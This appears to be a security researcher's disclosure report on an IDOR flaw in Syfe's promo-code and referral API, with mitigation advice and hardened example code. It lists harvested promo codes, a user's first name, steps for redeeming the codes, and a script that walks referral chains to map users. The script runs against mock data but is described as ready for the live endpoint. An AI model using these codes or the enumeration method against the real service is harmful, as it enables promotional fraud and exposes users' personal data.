Syfe
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in Syfe’s promo code system. It allows unauthorized access to valid referral codes and exposes the names of the users behind them. The flaw could be exploited to fraudulently redeem promo codes, leading to financial losses and reputational damage. A deeper issue was identified in the referral system: by iterating over the referrerAppliedCode value returned for each code, an attacker can recover the hierarchical structure of referrals between users, potentially leading to mass user data exposure.
The invite system uses API endpoints like:
The server responds with 200 OK, revealing the details of a valid promo code.
When referrerAppliedCode is null, no referrer is attached to the code; these are the codes listed under "Codes Without a Referrer" below, and they can be redeemed like any other.
The promo codes are also accessible via:
This endpoint exposes the referrer’s first name (e.g., Sze Wei) to anyone who supplies a valid code, which is a privacy violation in itself.
Categorization of Promo Codes Based on Referral Status:
Codes Without a Referrer (referrerAppliedCode: NULL):
SRP16LW72, SRPQ9XPUD, SRPS4H3NH, SRPVW9182, SRPRRBGSF, SRPRYKNMN, SRPSURFGP, SRPSSMRCG, SRPSSMNGY, SRPSXQDTY, SRPT2KZFA, SRP6X8B8Y, SRPTEBYFA, SRPTGPUD2, SRPTNFL5D, SRPTUW33H, sgsmi, NOMONEYLAH
Codes with an Existing Referrer (referrerAppliedCode: <code>):
SRP6G4YN8, SRPRDR9KS, SRPS4P5YC, SRPSL8MGX, SRPT54W4C, SRPTXDRBM, SRPSTTW7Y, SRPTJDXHM, SRPTH8LK3
Mapping User Referral Hierarchy:
By supplying the referrerAppliedCode value from one response as the code in a new request, it is possible to retrieve another user’s referrerId and firstName.
By following the referrerAppliedCode chain in this way, it is possible to reconstruct a tree-like structure of referrals.
Requesting /promo/referral/SRPTXDRBM returns:
Using SRPSTTW7Y in a new request reveals another user:
Continuing this process (with the other promo codes that I’ve found) reveals the full referral tree, potentially exposing thousands of user identities.
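The traversal described above, as an added example that is not part of the original report: it walks an offline, constructed stand-in for the /promo/referral/<code> endpoint, follows each referrerAppliedCode upward to its root, and inverts the chains into a parent-to-children tree. The field names (referrerId, firstName, referrerAppliedCode) are the ones the report names; every id, name and code-to-user mapping in the mock is invented, and the real codes from the report are used only as dictionary keys.

```python
# Constructed stand-in for the referral lookup endpoint. The field names
# (referrerId, firstName, referrerAppliedCode) are the ones named in the
# report; every code-to-user mapping, id and name below is invented.
MOCK_RESPONSES = {
    "SRPTXDRBM": {"referrerId": 1001, "firstName": "Alice", "referrerAppliedCode": "SRPSTTW7Y"},
    "SRPSTTW7Y": {"referrerId": 1002, "firstName": "Bob",   "referrerAppliedCode": "SRPS4H3NH"},
    "SRPS4H3NH": {"referrerId": 1003, "firstName": "Carol", "referrerAppliedCode": None},
    "SRP6G4YN8": {"referrerId": 1004, "firstName": "Dan",   "referrerAppliedCode": "SRPS4H3NH"},
    "SRP16LW72": {"referrerId": 1005, "firstName": "Eve",   "referrerAppliedCode": None},
}


def lookup(code):
    """Stand-in for GET /promo/referral/<code>: the JSON body on 200, None on 404."""
    return MOCK_RESPONSES.get(code)


def walk_chain(start_code):
    """Follow referrerAppliedCode upward until a root (null) or an unknown code.

    Returns [(code, referrerId, firstName), ...] from the start code to the root.
    The `seen` set guards against a cycle in the data, which would otherwise loop.
    """
    chain, seen, code = [], set(), start_code
    while code and code not in seen:
        seen.add(code)
        resp = lookup(code)
        if resp is None:
            break
        chain.append((code, resp["referrerId"], resp["firstName"]))
        code = resp["referrerAppliedCode"]
    return chain


def build_referral_tree(seed_codes):
    """Walk every seed code and invert the chains into parent -> children.

    Returns (roots, children): roots are codes whose referrerAppliedCode is
    null (or points at a code the endpoint does not know); children maps a
    code to the set of codes that applied it.
    """
    roots, children = set(), {}
    for seed in seed_codes:
        for code, _referrer_id, _first_name in walk_chain(seed):
            parent = lookup(code)["referrerAppliedCode"]
            if parent is None or lookup(parent) is None:
                roots.add(code)
            else:
                children.setdefault(parent, set()).add(code)
    return roots, children


def render_tree(roots, children):
    """Indented, one line per user: exactly what an attacker learns per node."""
    lines = []

    def visit(code, depth):
        resp = lookup(code)
        lines.append("  " * depth + f"{code} referrerId={resp['referrerId']} firstName={resp['firstName']}")
        for child in sorted(children.get(code, ())):
            visit(child, depth + 1)

    for root in sorted(roots):
        visit(root, 0)
    return lines


def exposed_identities(seed_codes):
    """Distinct (referrerId, firstName) pairs reachable from the seed codes."""
    return {(uid, name) for seed in seed_codes for _code, uid, name in walk_chain(seed)}


if __name__ == "__main__":
    roots, children = build_referral_tree(list(MOCK_RESPONSES))
    print("\n".join(render_tree(roots, children)))
    print(f"{len(exposed_identities(list(MOCK_RESPONSES)))} identities exposed")
```

Against the live endpoint the only change would be replacing lookup() with an HTTP GET; the seed list is whatever codes the enumeration in the previous sections produced, and each new referrerAppliedCode the walk discovers feeds back in as a further seed.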
Entropy analysis of the referral codes identified a predictable structure: apart from the two custom codes (sgsmi and NOMONEYLAH), every code listed above is the fixed prefix SRP followed by six characters from the uppercase alphanumeric set (36 symbols), a keyspace of 36^6 (about 2.2 billion, roughly 31 bits) with no throttling on the lookup endpoint, which makes enumeration feasible.
Attempting to redeem a retrieved promo code results in: "Promo code is currently under review. You will receive the benefits if you meet all the terms and conditions of the promos."
The code is accepted for review rather than rejected outright, which suggests attackers could create fake accounts to collect promotional bonuses.
For this case I will leave you a very fast video as a proof of concept, explaining the step-by-step process in Burp and the easy step-by-step:
That’s all.
Financial Fraud: Attackers can mass-harvest promo codes, create fake accounts, and exploit referral rewards, causing significant financial losses.
User Data Exposure: Real names and referral relationships are publicly accessible, leading to privacy breaches and phishing risks.
Reputation Damage: Public exposure of invitee data erodes user trust, potentially harming the company’s credibility and compliance standing.
Hierarchical Exposure: Attackers can map user referral chains, enabling targeted scams and account takeovers.
Remove referrerId and referrerAppliedCode from public responses.
Restrict access to promo codes, requiring authentication.
Increase entropy in promo code generation to prevent easy enumeration.
Enforce additional validation before applying promo codes.
Monitor exploitation attempts through logging and rate limiting.
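One way to implement these recommendations, and to put a number on the entropy point made earlier, as an added example that is not Syfe’s code: the vulnerable lookup (no authentication, internal fields echoed back, as the report describes) sits beside a hardened apply handler that requires a session, rate-limits by client address, refuses self-referral and repeat application with one generic error so the response no longer works as a validity oracle, and returns nothing but a success flag. The entropy figures use the SRP + six uppercase alphanumerics pattern observed in the report; the in-memory store, user ids, names, client addresses and the 5-per-60-seconds limit are all constructed for the example.

```python
import math
import secrets
import string
import time
from collections import defaultdict, deque

# Observed pattern from the report: the generated codes are "SRP" followed by
# six characters drawn from A-Z and 0-9, i.e. a 36-symbol alphabet.
ALPHABET = string.ascii_uppercase + string.digits


def entropy_bits(length, alphabet_size=len(ALPHABET)):
    """Bits of entropy in a code of `length` uniformly random symbols."""
    return length * math.log2(alphabet_size)


def generate_code(length=12, prefix="SRP"):
    """CSPRNG-backed code: 12 symbols gives ~62 bits against ~31 bits for six."""
    return prefix + "".join(secrets.choice(ALPHABET) for _ in range(length))


# Constructed in-memory store for this example; not Syfe's schema or data.
PROMO_CODES = {
    "SRPTXDRBM": {"ownerId": 1001, "firstName": "Alice", "referrerAppliedCode": "SRPSTTW7Y"},
    "SRPSTTW7Y": {"ownerId": 1002, "firstName": "Bob", "referrerAppliedCode": None},
}
APPLIED = {}  # userId -> code that user has already applied (constructed state)


class RateLimiter:
    """Sliding window: at most `limit` calls per `window` seconds for each key."""

    def __init__(self, limit, window):
        self.limit, self.window = limit, window
        self.hits = defaultdict(deque)

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def lookup_vulnerable(code):
    """Before: no authentication, and the response echoes internal fields.

    Mirrors the behaviour the report describes: a 200 carrying referrerId,
    firstName and referrerAppliedCode for any valid code, 404 otherwise.
    """
    rec = PROMO_CODES.get(code)
    if rec is None:
        return 404, {"error": "not found"}
    return 200, {"referrerId": rec["ownerId"], "firstName": rec["firstName"],
                 "referrerAppliedCode": rec["referrerAppliedCode"]}


LIMITER = RateLimiter(limit=5, window=60)  # constructed limit for the example


def apply_code_hardened(code, session_user_id, client_ip, now=None):
    """After: authenticated, rate-limited, validated, and a minimal response."""
    if session_user_id is None:
        return 401, {"error": "authentication required"}
    # Limit before the lookup so that invalid guesses also consume budget.
    if not LIMITER.allow(client_ip, now):
        return 429, {"error": "too many requests"}
    rec = PROMO_CODES.get(code)
    if rec is None or rec["ownerId"] == session_user_id or session_user_id in APPLIED:
        # One generic answer for unknown, self-referral and already-applied:
        # the response no longer distinguishes valid codes for enumeration.
        return 400, {"error": "code cannot be applied"}
    APPLIED[session_user_id] = code
    # No referrerId, firstName or referrerAppliedCode leaves the server.
    return 200, {"applied": True}
```

The rate limiter is keyed by client address only to keep the example short; in production it should also be keyed by the authenticated user, and the 429 and 400 paths should be logged with the code attempted so that a burst of distinct SRP-prefixed guesses from one source is visible to detection.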
This IDOR vulnerability exposes promo codes and user invite details, allowing unauthorized use and potential fraud. The ability to traverse the referral hierarchy further exacerbates the risk, exposing user relationships and identifiers. Mitigating this issue will prevent abuse and reinforce user trust in Syfe’s security framework.
Thank you,
Juan Felipe - Security Researcher
Open URL: <code> and replace the code with the promo codes listed in section 3, Categorization of Promo Codes Based on Referral Status.
Open the Syfe main website: <code>